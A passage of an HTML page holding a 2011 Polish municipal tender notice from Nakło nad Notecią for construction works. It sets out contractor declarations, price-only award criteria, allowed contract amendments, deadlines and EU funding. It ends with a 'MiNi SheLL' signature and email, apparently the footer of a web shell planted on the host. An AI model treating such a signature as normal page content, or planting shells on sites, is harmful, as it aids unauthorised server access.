albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
publicznego.
4.Oświadczenie, że Wykonawca zobowiązuje się w terminie do 14 dni od zawarcia 
 umowy do ubezpieczenia budowy z tytułu odpowiedzialności cywilnej na kwotę nie 
mniejszą niż wartość kontraktowa robót brutto określona w ofercie.
5)Oświadczenia o :
a)udzieleniu 36 miesięcznego okresu gwarancji jakości na wykonane roboty 
   i zamontowane urządzenia,
b)uporządkowaniu terenu po zakończeniu robót,
c)sporządzeniu dokumentacji powykonawczej, zaakceptowaniu warunków 
rozliczenia  określonych w rozdziale IV ust. 4 i 5,
d)sporządzeniu  Książki Obiektu Budowlanego zgodnie z Rozporządzeniem
Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie książki obiektu
budowlanego ( Dz. U.  Nr 120,  poz. 1134 ),
e)dokonaniu wizji lokalnej w terenie w dniu ........... 2011. 
f)wzory podpisów osoby ( lub osób ) uprawnionej do składania oświadczeń woli 
lub innych dokumentów :
	podpis skrócony tzw. parafa ze wskazaniem osoby, której jest własnością,
	podpis czytelny : imię i nazwisko lub tylko nazwisko.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2.Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie 	pisemnego aneksu na następujących warunkach:
1)Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2)Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
a)śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
b)nie wywiązywania się kluczowego specjalisty z obowiązków wynikających 	z umowy.
3)Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji itp.),
4)Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających  z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie        z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
5)Wykonawca może wnieść o przedłużenie terminu wykonania przedmiotu umowy 
o czas opóźnienia  Zamawiającego, jeżeli takie opóźnienie jest lub będzie miało
wpływ na wykonanie przedmiotu umowy w wykonaniu następujących
 zobowiązań:
a)przekazania terenu budowy,
b)przekazania dokumentacji budowy (pozwolenia na budowę, dokumentacji
projektowej, specyfikacji technicznych, innych wymaganych przepisami,
do których zamawiający był zobowiązany),
c)przekazania dokumentów zamiennych budowy lub usunięcia wad                      w dostarczanej dokumentacji projektowej,
d)zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób 
dodatkowych nieobjętych umową,
e)zmiany terminu dokonania odbiorów przewidzianych w umowie.
6)Wykonawca może wnieść o przedłużenie terminu wykonania przedmiotu umowy  o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:
a)zawieszenia robót przez Zamawiającego,
b)siły wyższej, klęski żywiołowej,
c)jakiegokolwiek opóźnienia, utrudnienia lub przeszkody  spowodowane przez lub
dających się przypisać Zamawiającemu lub innemu  Wykonawcy zatrudnionemu  przez Zamawiającego na terenie budowy,
d)odmiennych od przyjętych w dokumentacji projektowej warunków realizacji
zadania (wzmocnienie dachu, zmiany detali architektonicznych itp.)  
7)Jeżeli wystąpią zmiany będące następstwem okoliczności leżących po stronie 
Zamawiającego , w szczególności:
a)wstrzymanie robót przez  Zamawiającego,
b)konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji
projektowej.
8)Jeżeli powstaną okoliczności będące następstwem działania  organów administracji, w szczególności:
a)przekroczenie zakreślonych przez prawo terminów wydawania przez organy
administracji decyzji,  zezwoleń  itp.,
b)odmowa wydania przez organy administracji wymaganych  decyzji, zezwoleń,  uzgodnień na skutek błędów w dokumentacji projektowej.
9)Jeżeli powstały konieczne zmiany  technologiczne, w szczególności:
a)konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych/technologicznych  niż wskazane w dokumentacji  projektowej
w sytuacji, gdyby zastosowanie przewidzianych  rozwiązań  groziłoby
niewykonaniem  	lub wadliwym  wykonaniem  przedmiotu umowy,
b)konieczność zrealizowania przedmiotu umowy przy  zastosowaniu innych
rozwiązań technicznych lub materiałowych ze względu na zmiany
 obowiązującego  prawa.Zmiany wskazywane w lit d) będą wprowadzone wyłącznie w zakresie  umożliwiającym  oddanie przedmiotu  umowy do użytkowania, a  Zamawiający  może ponieść ryzyko zwiększanym z tego powodu  kosztom. Każde ze wskazanych  w pkt 9 w  lit. a i lit b   zmian  może  być powiązane ze zmianą  wynagrodzenia na zasadach 	określonych  przez strony.
10)Pozostałe zmiany 
a)jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów
wykonania  po stronie  Wykonawcy, Zamawiający  dopuszcza  możliwość
zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT
zapłaconego  przez  Wykonawcę, 
b)jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania
umowy  po  stronie Wykonawcy, Zamawiający  przewiduje  możliwość
zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,
c)kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty
inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do
zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie
zostanie  ustalone z zachowaniem  zasady opisanej w specyfikacji SIWZ
 i ofercie Wykonawcy,
d)zmiany uzasadnione  okolicznościami, o których  mowa w art. 357 Kodeksu
cywilnego z uwzględnieniem  faktu, że  za rażącą  zostanie uznana strata
w wysokości, o  której mowa w art. 397 Kodeksu spółek handlowych.
8.Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)opis zmiany,
2)uzasadnienie zmiany,
3)koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
9.Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. Inspektorzy Nadzoru oraz Kierownik budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.naklo.pu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy nad Notecią ul.Ks.P.Skargi 7  89-100 Nakło nad Notecią  u p. Małgorzaty Dąbrowskiej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2011 godzina 10:00, miejsce: Urząd Miasta i Gminy Nakło nad Notecią, ul.Ks.P.Skargi 7, pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dofinansowanie  w ramach działania 4.1/413 Wdrażanie Lokalnych Strategii Rozwoju w ramach działania  Odnowa	i rozwój wsi objętego PROW na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com